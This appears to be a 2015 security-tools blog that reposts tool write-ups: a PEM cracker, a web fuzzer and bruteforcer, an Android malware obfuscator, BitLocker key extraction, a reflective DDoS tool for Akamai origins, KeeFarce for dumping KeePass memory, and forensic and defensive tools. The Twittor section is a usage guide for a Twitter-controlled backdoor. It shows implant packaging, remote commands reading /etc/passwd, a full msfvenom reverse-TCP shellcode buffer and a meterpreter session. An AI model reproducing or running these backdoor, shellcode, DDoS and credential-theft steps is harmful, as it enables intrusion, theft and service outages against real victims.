PEMcracker Tool To Crack Encrypted PEM Files

PEMcracker Tool To Crack Encrypted PEM Files

This tool is inspired by pemcrack by Robert Graham. The purpose is to attempt to recover the password for encrypted PEM files while utilizing all the CPU cores.

It still uses high level OpenSSL calls in order to guess the password. As an optimization, instead of continually checking against the PEM on disk, it is loaded into memory in each thread.

bwall@ragnarok:~$ ./pemcracker 
pemcracker 0.1.0
pemcracker

pemcracker 0.1.0 by Brian Wallace (@botnet_hunter)

Usage Example

bwall@ragnarok:~/data/publicprojects/pemcracker$ ./pemcracker test.pem test.dict
Password is komodia for test.pem

Compiling

make

This is somewhat of a short side project, so my apologies for any issues. If there is desire for this project to be further developed, I will try to allocate time.

Alternatives

If you are looking for the fastest possible method of brute forcing PEM files, you may wish to try out John the Ripper. Its little known ssh2john allows for converting PEM files to a format that can be fed into ./john.

Download

Read more

by Malik korrich ~ mercredi 18 novembre 2015 0 commentaires

0d1n Open Source Web HTTP Fuzzing Tool And Bruteforcer

0d1n is a tool for automating customized attacks against web applications. This Web security tool to make fuzzing at HTTP inputs, made in C with libCurl.

0d1n is an open source web HTTP fuzzing tool and bruteforcer. 0d1n can increase your productivity following web parameters, files, directories, forms and other things.

You can do:

• *brute force passwords in auth forms
• *diretory disclosure ( use PATH list to brute, and find HTTP status code )
• *test list on input to find SQL Injection and XSS vulnerabilities

to run:

require libcurl-dev or libcurl-devel(on rpm linux based)

$ git clone https://github.com/CoolerVoid/0d1n/

need libcurl to run

$ sudo apt-get install libcurl-dev

if rpm distro

$ sudo yum install libcurl-devel

$ make

$./0d1n


Download

Read more

by Malik korrich ~ samedi 14 novembre 2015 0 commentaires

AAMO: Another Android Malware Obfuscator

AAMO: Another Android Malware Obfuscator

Set of code-obfuscation scripts tailored for Android applications. Assume that the original application can be disassembled into Smali.

Usage

$ mkdir dir_with_apks_to_obfuscate/     # fill the dir with some APKs
$ vim obfuscators/obfuscators.py

Set the obfuscator_to_apply variable to define the list of obfuscators you want to apply.

For example:

obfuscator_to_apply = [
    'Resigned',
    'Alignment',
    'Rebuild',
    'Fields',
    'Debug',
    'Indirections',
    'Defunct',
    'StringEncrypt',
    'Renaming',
    'Reordering',
    'Goto',
    'ArithmeticBranch',
    'Nop',
    'Asset',
    'Intercept',
    'Raw',
    'Resource',
    'Lib',
    'Restring',
    'Manifest',
    'Reflection']

You can choose a subset of obfuscators (recommended).

$ python obfuscators/obfuscators.py

Enjoy your obfuscated APKs.

Obfuscation Operators

Support:

Android specific

• Repackaging
• Reassembly
• Re-alignment

Simple control-flow modifications

• Junk code insertion
• Debug symbols stripping
• Defunct code insertion
• Unconditional jump insertion

Advanced control-flow modifications

• Call indirection
• Code reordering
• Reflection
• Opaque predicate insertion

Renaming

• Non-code files and resource renaming
• Fields and methods renaming
• Package renaming

Encryption

• Resource encryption (asset files)
• Native code encryption
• Data encryption (strings)

Download

Read more

by Malik korrich ~ vendredi 13 novembre 2015 0 commentaires

Volatility Framework Plugin For Extracting BitLocker FVEK (Full Volume Encryption Key)

Volatility Framework Plugin For Extracting BitLocker FVEK (Full Volume Encryption Key)

Volatility plugin: Bitlocker

This plugin finds and extracts BitLocker Full Volume Encryption Key (FVEK) which can be used to decrypt BitLocker volumes.

Currently only Windows Vista/7 memory images are supported.

Example use case

Evidence #1: John's computer HDD binary image: John_HDD.dd

Evidence #2: John's computer memory dump: John_Win7SP1x64.raw

1) Determine the offset of encrypted BitLocker volume. In the following example it's the second NTFS partition starting from sector 718848. Note the "-FVE-FS-" signature.

$ mmls John_HDD.dd
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

     Slot    Start        End          Length       Description
00:  Meta    0000000000   0000000000   0000000001   Primary Table (#0)
01:  -----   0000000000   0000002047   0000002048   Unallocated
02:  00:00   0000002048   0000718847   0000716800   NTFS (0x07)
03:  00:01   0000718848   0031455231   0030736384   NTFS (0x07)
04:  -----   0031455232   0031457279   0000002048   Unallocated
$
$ hexdump -C -s $((718848*512)) -n 16 John_HDD.dd
15f00000  eb 58 90 2d 46 56 45 2d  46 53 2d 00 02 08 00 00  |.X.-FVE-FS-.....|
15f00010

2) Use bitlocker plugin to extract FVEK. It's convenient to use optional argument --dump-dir in order to specify the directory in which cipher ID (first 2 bytes) and FVEK (64 bytes) will be saved.

$ export VOLATILITY_LOCATION=file://./John_Win7SP1x64.raw
$ export VOLATILITY_PROFILE=Win7SP1x64
$
$ python vol.py bitlocker --dump-dir ./keys
Volatility Foundation Volatility Framework 2.5

Cipher: AES-128 + Elephant diffuser (0x8000)
FVEK: 2140c8afcbb835127b3b5b97fdcc8b846b7d97fba0c5a2e9dbfef97e263272fa4543af87702c4cee4252eaaa0b7fdc2a96c54aace6e90642a4bbece8afc430c2
FVEK dumped to: ./keys/0xfa80018fe8c0.fvek

3) Use extracted FVEK to decrypt the volume using dislocker in FUSE mode.

$ sudo dislocker-fuse -V John_HDD.dd -k ./keys/0xfa80018fe8c0.fvek -o $((718848*512)) -- /mnt/ntfs
$
$ sudo mount -o loop,ro /mnt/ntfs/dislocker-file /mnt/clear
$
$ ls -lh /mnt/clear
total 730M
lrwxrwxrwx 2 root root   60 Jul 14  2009 Documents and Settings -> /mnt/clear/Users
-rwxrwxrwx 1 root root 730M Nov  4 09:39 pagefile.sys
drwxrwxrwx 1 root root    0 Jul 13  2009 PerfLogs
drwxrwxrwx 1 root root 4.0K Nov  4 09:58 ProgramData
drwxrwxrwx 1 root root 4.0K Apr 12  2011 Program Files
drwxrwxrwx 1 root root 4.0K Nov  4 07:01 Program Files (x86)
drwxrwxrwx 1 root root    0 Nov  4 07:04 Recovery
drwxrwxrwx 1 root root    0 Nov  4 09:57 $Recycle.Bin
drwxrwxrwx 1 root root 4.0K Nov  4 07:05 System Volume Information
drwxrwxrwx 1 root root 4.0K Nov  4 09:56 Users
drwxrwxrwx 1 root root  24K Nov  4 09:58 Windows

Download

Read more

by Malik korrich ~ samedi 7 novembre 2015 0 commentaires

Akamai Reflective DDoS Tool

Akamai Reflective DDoS Tool

Attack the origin host behind the Akamai Edge hosts and bypass the DDoS protection offered by Akamai services.


How it works ?


Based off the research done at NCC:

Akamai boast around 100,000 edge nodes around the world which offer load balancing, web application firewall, caching etc, to ensure that a minimal amount of requests actually hit your origin web-server beign protected. However, the issue with caching is that you cannot cache something that is non-deterministic, I.E a search result. A search that has not been requested before is likely not in the cache, and will result in a Cache-Miss, and the Akamai edge node requesting the resource from the origin server itself.

What this tool does is, provided a list of Akamai edge nodes and a valid cache missing request, produces multiple requests that hit the origin server via the Akamai edge nodes. As you can imagine, if you had 50 IP addresses under your control, sending requests at around 20 per second, with 100,000 Akamai edge node list, and a request which resulting in 10KB hitting the origin, if my calculations are correct, thats around 976MB/ps hitting the origin server, which is a hell of a lot of traffic.

Finding Akamai Edge Nodes

To find Akamai Edge Nodes, the following script has been included:

# python ARDT_Akamai_EdgeNode_Finder.py

This can be edited quite easily to find more, it then saves the IPS automatically.


Download

About the Author :
Christian Galeone is an IT Security Specialist from Italy. He has been Acknowledged by the TOP IT 5 Companies including Yahoo!, Microsoft, AT&T, Sony. He is currently working with HOC as Author of Cyber Security & VA Research Articles.

Read more

by Malik korrich ~ jeudi 5 novembre 2015 0 commentaires

KeeFarce: Extract Passwords From KeePass 2.x Database Directly From Memory

KeeFarce: Extract Passwords From KeePass 2.x Database, Directly From memory.

KeeFarce allows for the extraction of KeePass 2.x password database information from memory. The cleartext information, including usernames, passwords, notes and url's are dumped into a CSV file in %AppData%.

General Design

KeeFarce uses DLL injection to execute code within the context of a running KeePass process. C# code execution is achieved by first injecting an architecture-appropriate bootstrap DLL. This spawns an instance of the dot net runtime within the appropriate app domain, subsequently executing KeeFarceDLL.dll (the main C# payload).

The KeeFarceDLL uses CLRMD to find the necessary object in the KeePass processes heap, locates the pointers to some required sub-objects (using offsets), and uses reflection to call an export method.

Prebuilt Packages

An appropriate build of KeeFarce needs to be used depending on the KeePass target's architecture (32 bit or 64 bit). Archives and their shasums can be found under the 'prebuilt' directory.

Executing

In order to execute on the target host, the following files need to be in the same folder:

• BootstrapDLL.dll
• KeeFarce.exe
• KeeFarceDLL.dll
• Microsoft.Diagnostic.Runtime.dll

Copy these files across to the target and execute KeeFarce.exe

Building

Open up the KeeFarce.sln with Visual Studio (note: dev was done on Visual Studio 2015) and hit 'build'. The results will be spat out into dist/$architecture. You'll have to copy the KeeFarceDLL.dll files and Microsoft.Diagnostic.Runtime.dll files into the folder before executing, as these are architecture independent.

Compatibility

KeeFarce has been tested on:

KeePass 2.28, 2.29 and 2.30 - running on Windows 8.1 - both 32 and 64 bit.
This should also work on older Windows machines (win 7 with a recent service pack). If you're targeting something other than the above, then testing in a lab environment before hand is recommended.

Download

Read more

by Malik korrich ~ samedi 31 octobre 2015 0 commentaires

TOR Released Beta Messenger A Cross-Platform Chat Program Based On Instantbird

TOR Released Beta Messenger A Cross-platform Chat Program Based On Instantbird.

Tor Messenger is a cross-platform chat program that aims to be secure by default and sends all of its traffic over Tor. 

It supports a wide variety of transport networks, including Jabber (XMPP), IRC, Google Talk, Facebook Chat, Twitter, Yahoo, and others; enables Off-the-Record (OTR) Messaging automatically; and has an easy-to-use graphical user interface localized into multiple languages.

InstantBird:
A number of messaging clients: Pidgin, Adam Langley's xmpp-client, and Instantbird. Instantbird was the pragmatic choice -- its transport protocols are written in a memory-safe language (JavaScript); it has a graphical user interface and already supports many natural languages; and it's a XUL application, which means we can leverage both the code (Tor Launcher) and in-house expertise that the Tor Project has developed working on Tor Browser with Firefox. It also has an active and vibrant software developer community that has been very responsive and understanding of our needs. The main feature it lacked was OTR support, which we have implemented and hope to upstream to the main Instantbird repository for the benefit of all Instantbird (and Thunderbird) users.

Instructions

• On Linux, extract the bundle(s) and then run: ./start-tor-messenger.desktop
• On OS X, copy the Tor Messenger application from the disk image to your local disk before running it.
• On all platforms, Tor Messenger sets the profile folder for Firefox/Instantbird to the installation directory.
• Note that as a policy, unencrypted one-to-one conversations are not allowed and your messages will not be transmitted if the person you are talking with does not have an OTR-enabled client. You can disable this option in the preferences to allow unencrypted communication but doing so is not recommended.

Downloads

• Linux (32-bit)
• Linux (64-bit)
• Windows
• OS X
• sha256sums.txt
• sha256sums.txt.asc

Source: TOR

Read more

by Malik korrich ~ jeudi 29 octobre 2015 0 commentaires

WhatsApp Bot Seed: A Small Python Framework To Create A WhatsApp Bot Like A Web Framework

A small python framework to create a whatsapp bot, with regex-callback message routing (just like a web framework).

What it does?

Basic message handling:
Example

Automatic media (images and videos) download, and url print screens
Example

Youtube Video Downloads, and Text to Speech
Example

Google image and web search
Example

Group administration
Example

Installation

• Install the image handling system dependencies on bash opt/system-requirements.sh
• Create a virtualenv and install the requirements pip install -r opt/requirements.pip
• Follow the instructions on src/config.py to get the whatsapp credentials.
• Then just run the server with python src/server.py

To create your own views, check the src/router.py, and the src/view/basic_views.py for a simple example.

Download

Read more

by Malik korrich ~ mercredi 28 octobre 2015 0 commentaires

Sniffly To Sniffing Browser History Using HSTS And CSP

Sniffly Trick For Browser Fingerprinting. Sniffing browser history using HSTS + CSP.

Sniffly is an attack that abuses HTTP Strict Transport Security and Content Security Policy to allow arbitrary websites to sniff a user's browsing history. It has been tested in Firefox and Chrome.

How it works

I recommend reading the inline comments in src/index.js to understand how Sniffly does a timing attack in both FF and Chrome without polluting the local HSTS store. tl;dr version:

1. User visits Sniffly page
2. Browser attempts to load images from various HSTS domains over HTTP
3. Sniffly sets a CSP policy that restricts images to HTTP, so image sources are blocked before they are redirected to HTTPS. This is crucial! If the browser completes a request to the HTTPS site, then it will receive the HSTS pin, and the attack will no longer work when the user visits Sniffly.
4. When an image gets blocked by CSP, its onerror handler is called. In this case, the onerror handler does some fancy tricks to time how long it took for the image to be redirected from HTTP to HTTPS. If this time is on the order of a millisecond, it was an HSTS redirect (no network request was made), which means the user has visited the image's domain before. If it's on the order of 100 milliseconds, then a network request probably occurred, meaning that the user hasn't visited the image's domain.

Finding HSTS hosts

To scrape an included list of sites (util/strict-transport-security.txt, courtesy Scott Helme) to determine which hosts send HSTS headers, do:

$ cd util
$ ./run.sh > results.log

where 1 batch is 100 sites. You can override util/strict-transport-security.txt with a different list, such as the full Alexa Top 1M, if you want.

To process and sort the results by max-age, excluding ones with max-age less than 1 day and ones that are preloaded:

$ cd util
$ ./process.py > processed.log

Once that's done, you can copy the hosts from processed.log into src/index.js.

Running sploitz

Visiting file:///path/to/sniffly/src/index.html in Chrome should just work. In Firefox, CSP headers using the tag are apparently not supported yet, so you need to set up a local webserver to serve the CSP HTTP response header. My Nginx server block looks something like this:

server {
    listen 8081;
    server_name localhost;
    location / {
        root /path/to/sniffly/src;
        add_header Content-Security-Policy "img-src http://*";
        index index.html;
    }
}

Caveats

Not supported yet in Safari, IE, or Chrome on iOS.
Extensions such as HTTPS Everywhere will mess up results.
Doesn't work reliably in Tor Browser since timings are rounded to the nearest 100-millisecond.
Users with a different HSTS preload list (ex: due to having an older browser) may not see accurate results.

More info available in my ToorCon 2015 slides: https://zyan.scripts.mit.edu/presentations/toorcon2015.pdf.

Demo

Visit http://zyan.scripts.mit.edu/sniffly/ in Firefox/Chrome/Opera with HTTPS Everywhere disabled. If you use an ad blocker, a bunch of advertising domains will probably show up in the "Probably Visited" column (ignore them).

Download

Read more

by Malik korrich ~ lundi 26 octobre 2015 0 commentaires

Lets Encrypt Offers Free SSL Certificates To All Websites

Lets Encrypt Offers Free SSL Certificates To All Websites.

Lets Encrypt Your Website with Free HTTPS Certificate.

Hyper Text Transfer Protocol Secure (HTTPS) is the secure version of HTTP, the protocol over which data is sent between your browser and the website that you are connected to. The 'S' at the end of HTTPS stands for 'Secure'. It means all communications between your browser and the website are encrypted.

According to Lets Encrypt

We’re pleased to announce that we’ve received cross-signatures from IdenTrust, which means that our certificates are now trusted by all major browsers. This is a significant milestone since it means that visitors to websites using Let’s Encrypt certificates can enjoy a secure browsing experience with no special configuration required.

Both Let’s Encrypt intermediate certificates, Let’s Encrypt Authority X1 and Let’s Encrypt Authority X2, received cross-signatures. Web servers will need to be configured to serve the appropriate cross-signature certificate as part of the trust chain. The Let’s Encrypt client will handle this automatically.

You can see an example of a server using a Let’s Encrypt certificate under a new cross-signed intermediate here.

Vital personal and business information is flowing over the Internet more frequently than ever, and it’s time to encrypt all of it. That’s why we created Let’s Encrypt, and we’re excited to be one big step closer to bringing secure connections to every corner of the Web.

Company will offer Free HTTPS Certificate by November 2015.

Read more

by Malik korrich ~ vendredi 23 octobre 2015 0 commentaires

LiME Linux Memory Extractor

LiME ~ Linux Memory Extractor

A Loadable Kernel Module (LKM) which allows for volatile memory acquisition from Linux and Linux-based devices, such as Android.

This makes LiME unique as it is the first tool that allows for full memory captures on Android devices. It also minimizes its interaction between user and kernel space processes during acquisition, which allows it to produce memory captures that are more forensically sound than those of other tools designed for Linux memory acquisition.

Table of Contents

• Features
• Usage
• Examples
• Presentation

Features

• Full Android memory acquisition
• Acquisition over network interface
• Minimal process footprint

Usage

Detailed documentation on LiME's usage and internals can be found in the "doc" directory of the project.

LiME utilizes the insmod command to load the module, passing required arguments for its execution.

insmod ./lime.ko "path=> format= [dio=<0|1>]"

path (required):   outfile ~ name of file to write to on local system (SD Card)
        tcp:port ~ network port to communicate over

format (required): raw ~ concatenates all System RAM ranges
        padded ~ pads all non-System RAM ranges with 0s
        lime ~ each range prepended with fixed-size header containing address space info

dio (optional):    1 ~ attempt to enable Direct IO
        0 ~ default, do not attempt Direct IO

localhostonly (optional):  1 restricts the tcp to only listen on localhost, 0 binds on all interfaces (default)

Examples

In this example we use adb to load LiME and then start it with acquisition performed over the network

$ adb push lime.ko /sdcard/lime.ko
$ adb forward tcp:4444 tcp:4444
$ adb shell
$ su
# insmod /sdcard/lime.ko "path=tcp:4444 format=lime"

Now on the host machine, we can establish the connection and acquire memory using netcat

$ nc localhost 4444 > ram.lime

Acquiring to sdcard

# insmod /sdcard/lime.ko "path=/sdcard/ram.lime format=lime"


Download

Read more

by Malik korrich ~ mercredi 21 octobre 2015 0 commentaires

Twittor A Fully Featured Backdoor That Uses Twitter As Command And Control Server

Twittor: A Fully Featured Backdoor That Uses Twitter As Command And Control Server..

A stealthy Python based backdoor that uses Twitter (Direct Messages) as a command and control server This project has been inspired by Gcat which does the same but using a Gmail account.

Setup

For this to work you need:

• A Twitter account (Use a dedicated account! Do not use your personal one!)
• Register an app on Twitter with Read, write, and direct messages Access levels.

Install the dependencies:

$ pip install -r requirements.txt

This repo contains two files:

twittor.py which is the client
implant.py the actual backdoor to deploy

In both files, edit the access token part and add the ones that you previously generated:

CONSUMER_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

ACCESS_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_TOKEN_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

USERNAME = 'XXXXXXXXXXXXXXXXXXXXXXXX'

You're probably going to want to compile implant.py into an executable using Pyinstaller In order to remove the console when compiling with Pyinstaller, the flags --noconsole --onefile will help. Just saying.

Usage
In order to run the client, launch the script.

$ python twittor.py

You'll then get into an 'interactive' shell which offers few commands that are:

$ help

    refresh - refresh C&C control
    list_bots - list active bots
    list_commands - list executed commands
    !retrieve - retrieve jobid command
    !cmd command - execute the command on the bot
    !shellcode shellcode - load and execute shellcode in memory (Windows only)
    help - print this usage
    exit - exit the client

$ 

Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:

$ list_bots
B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-with-Ubuntu-14.04-precise
$

The output is the MAC address which is used to uniquely identifies the system but also gives you OS information the implant is running on. In that case a Linux box.

Let's issue a command to an implant:

$ !cmd B7:76:1F:0B:50:B7 cat /etc/passwd
[+] Sent command "cat /etc/passwd" with jobid: UMW07r2
$

Here we are telling B7:76:1F:0B:50:B7 to execute cat /etc/passwd, the script then outputs the jobid that we can use to retrieve the output of that command

Lets get the results!

$ !retrieve UMW07r2
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
(...)

Command to use in that case is !retrieve followed by the jobid from the command.

Refresh results
In order to retrieve new bots/command outputs but also force the client to refresh the results, use the refresh command.

$ refresh
[+] Sending command to retrieve alive bots
[+] Sleeping 10 secs to wait for bots
$

This will send a PING request and wait 10 seconds for them to answer. Direct messages will then be parsed - Bot list will be refreshed but also the command list, including new command outputs.

Retrieve previous commands
As I said earlier, (previous) commands will be retrieved from older direct messages (limit is 200) and you can actually retrieve/see them by using the list_commands command

$ list_commands
8WNzapM: 'uname -a ' on 2C:4C:84:8C:D3:B1
VBQpojP: 'cat /etc/passwd' on 2C:4C:84:8C:D3:B1
9KaVJf6: 'PING' on 2C:4C:84:8C:D3:B1
aCu8jG9: 'ls -al' on 2C:4C:84:8C:D3:B1
8LRtdvh: 'PING' on 2C:4C:84:8C:D3:B1
$

Running shellcode (Windows hosts)
This option might be handy in order to retrieve a meterpreter session and this article becomes really useful.

Generate your meterpreter shellcode, like:

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=3615 -f python
(...)
Payload size: 299 bytes
buf =  ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
buf += "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x00\x00\x01\x68"
buf += "\x02\x00\x0e\x1f\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
buf += "\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a"
buf += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
buf += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6"
buf += "\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"

Extract the shellcode and send it to the specified bot using the !shellcode command!

$ !shellcode 11:22:33:44:55 \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b (...)
[+] Sent shellcode with jobid: xdr7mtN
$

There you go!

msf exploit(handler) > exploit

[*] Started reverse handler on 10.0.0.1:3615 
[*] Starting the payload handler...
[*] Sending stage (884270 bytes) to 10.0.0.99
[*] Meterpreter session 1 opened (10.0.0.1:3615 -> 10.0.0.99:49254) at 2015-09-08 10:19:04 -0400

meterpreter > getuid
Server username: WIN-XXXXXXXXX\PaulSec

Contributing and/or questions?
Project is entirely open source and released under MIT license. I mostly wanted to create a PoC after Twitter decided to remove the 140 characters limit for the Direct Messages. Few stuff should be added such as Encryption (Adding AES on top of it). "Messages" are using a dictionary data structure and the whole command is only base64 encoded. Fork the project, contribute, submit pull requests, and have fun.

Download

Note: This is the only Educational purpose

Read more

by Malik korrich ~ lundi 12 octobre 2015 0 commentaires

This Female Hacker SexyCyborg Can Break The Security With Her Shoe Heels

This Female Hacker SexyCyborg Can Break The Security With Her Shoe Heels

Her shoes hide the equipment's for hacking into Wi-Fi networks. She can secretly sniff your computers with hidden WiFi testing tools and steal the data remotely.

How She get the idea ? 

she said,

"My typical clothing does not leave room to hide anything- which is all the more reason they would not be suspicious of me."

With my shadowless shoes I distract the target with my…upper body and they don’t see the real danger on my feet, "

I’ve been watching the TV show "Mr. Robot" and while I know not all of it is accurate some of it is and it got me curious. I’m already pretty comfortable with command line and remote server administration from my web development work, and it turns out a lot of ‘hacking’ tools are just testing tools any sensible IT professional would use- just without a GUI.

So I spent the month hitting the books (well web pages) watching lots of videos and learning a bit about information security and penetration testing (I wonder how many idiot jokes that phrase is going to cause…). I still don’t know much, but I know a tiny bit more than I did. Enough to ask people who know more than me the right questions- and enough for a fun project.

So I devised the Wu Ying Shoes (无影鞋)! - Penetration Testing Platform Heels!  "Wu Ying" means “shadowless",

What she can bring inside the Sandal Heels

• USB keylogger
• Retractable Ethernet cable for OpenWRT router
• Lock-picking set.

Watch the Video, How she break the Security? 

Read more

by Malik korrich ~ mercredi 7 octobre 2015 0 commentaires

MEMSCAN A Memory Scanning Tool For A Specific Sequence of Bytes

MEMSCAN A Memory Scanning Tool.. 
For A Specific Sequence of Bytes!

A memory scanning tool which uses mach_vm* to either dump memory or look for a specific sequence of bytes.
To build MEMSCAN, you will need to have the OS installed. Well, you don't really need it but it makes life easier.

Once Theos is installed, simply navigate to the MEMSCAN folder in terminal and run:

make package install

Usage

Dumping the memory of a process

1. Obtain the target process PID, using ps.
2. Provide the PID to memscan:

./memscan -p -d

Finding objects in memory

Open your target app or process in a disassembler, grab first ~16 bytes (customise this number as you will) of the method you want to hook and these bytes will be your "signature".

Write the signature to a file, make sure to encode the bytes like so:

echo -n -e '\x55\x48\x89\xE5\xB8\x15\x00\x00\x00\x5D' > needle

Run the scanner against the target process. It will locate the signature in memory and print it's address. The signature has to be passed in as bytes, not a literal string so use the scanner as shown:

./memscan -p -s  

e.g:

./memscan -p 1234 -s ./needle

MEMSCAN should then print the address where the needle is located in memory.


Download

Read more

by Malik korrich ~ lundi 5 octobre 2015 0 commentaires

BLUTO For DNS Recon, Brute Forcer and DNS Zone Transfer

BLUTO is attempting to Brute Force the target domain.
Recon, Subdomain Bruting, Zone Transfers.

The target domain is queried for MX and NS records. Sub-domains are passively gathered via NetCraft. The target domain NS records are each queried for potential Zone Transfers. If none of them gives up their spinach, Bluto will brute force subdomains using parallel sub processing on the top 20000 of the 'The Alexa Top 1 Million subdomains'.

NetCraft results are presented individually and are then compared to the brute force results, any duplications are removed and particularly interesting results are highlighted.

Bluto requires various other dependencies. So to make things as easy as possible, pip is used for the installation. This does mean you will need to have pip installed prior to attempting the Bluto install.

Pip Install Instructions

Note: To test if pip is already installed execute.

pip -V

(1) Mac and Kali users can simply use the following command to download and install pip.

curl https://bootstrap.pypa.io/get-pip.py -o - | python

Bluto Install Instructions

(1) Once pip has successfully downloaded and installed, we can install Bluto:

pip install git+git://github.com/RandomStorm/Bluto

(2) You should now be able to execute 'bluto.py' from any working directory in any terminal.

bluto.py

Upgrade Instructions

(1) The upgrade process is as simple as;

pip install git+git://github.com/RandomStorm/Bluto --upgrade


Download

Read more

by Malik korrich ~ mercredi 30 septembre 2015 0 commentaires

Thug: A Tool For Python Low-Interaction Honeyclient

Thug: A Tool For Python Low-Interaction Honeyclient

Thug is a Python low-interaction honeyclient aimed at mimicing the behavior of a web browser in order to detect and emulate malicious contents.

The number of client-side attacks has grown significantly in the past few years shifting focus on poorly protected vulnerable clients. Just as the most known honeypot technologies enable research into server-side attacks, honeyclients allow the study of client-side attacks.

A complement to honeypots, a honeyclient is a tool designed to mimic the behavior of a user-driven network client application, such as a web browser, and be exploited by an attacker's content.


Download

Read more

by Malik korrich ~ 0 commentaires

How To Test Security in IPv4 and IPv6 Data Networks?

How To Test Security in IPv4 and IPv6 Data Networks ?

Evil Foca is a tool for security pentesters and auditors whose purpose it is to test security in IPv4 and IPv6 data networks. 

Compared to IPv4 address space is 32 bits which resulting 4 billion addresses.IPv6 offers larger address space. Its addresses are 128 bits long, resulting in an address space of 340 undecillion addresses.


In addition, IPv6 provides other technical benefits, particularly, it permits hierarchical address allocation methods that facilitate route aggregation across the Internet, and thus limit the expansion of routing tables. The use of multicast addressing is expanded and simplified, and provides additional optimization for the delivery of services. Device mobility, security, and configuration aspects have been considered in the design of the protocol.

The tool is capable of carrying out various attacks such as:

• MITM over IPv4 networks with ARP Spoofing and DHCP ACK Injection.
• MITM on IPv6 networks with Neighbor Advertisement Spoofing, SLAAC attack, fake DHCPv6.
• DoS (Denial of Service) on IPv4 networks with ARP Spoofing.
• DoS (Denial of Service) on IPv6 networks with SLAAC DoS.
• DNS Hijacking.

The software automatically scans the networks and identifies all devices and their respective network interfaces, specifying their IPv4 and IPv6 addresses as well as the physical addresses through a convenient and intuitive interface.

Man In The Middle (MITM) attack

The well-known “Man In The Middle” is an attack in which the wrongdoer creates the possibility of reading, adding, or modifying information that is located in a channel between two terminals with neither of these noticing. Within the MITM attacks in IPv4 and IPv6 Evil Foca considers the following techniques:

ARP Spoofing: Consists in sending ARP messages to the Ethernet network. Normally the objective is to associate the MAC address of the attacker with the IP of another device. Any traffic directed to the IP address of the predetermined link gate will be erroneously sent to the attacker instead of its real destination.

DHCP ACK Injection: Consists in an attacker monitoring the DHCP exchanges and, at some point during the communication, sending a packet to modify its behavior. Evil Foca converts the machine in a fake DHCP server on the network.

Neighbor Advertisement Spoofing: The principle of this attack is identical to that of ARP Spoofing, with the difference being in that IPv6 doesn’t work with the ARP protocol, but that all information is sent through ICMPv6 packets. There are five types of ICMPv6 packets used in the discovery protocol and Evil Foca generates this type of packets, placing itself between the gateway and victim.

SLAAC attack: The objective of this type of attack is to be able to execute an MITM when a user connects to Internet and to a server that does not include support for IPv6 and to which it is therefore necessary to connect using IPv4. This attack is possible due to the fact that Evil Foca undertakes domain name resolution once it is in the communication media, and is capable of transforming IPv4 addresses in IPv6.

Fake DHCPv6 server: This attack involves the attacker posing as the DCHPv6 server, responding to all network requests, distributing IPv6 addresses and a false DNS to manipulate the user destination or deny the service.

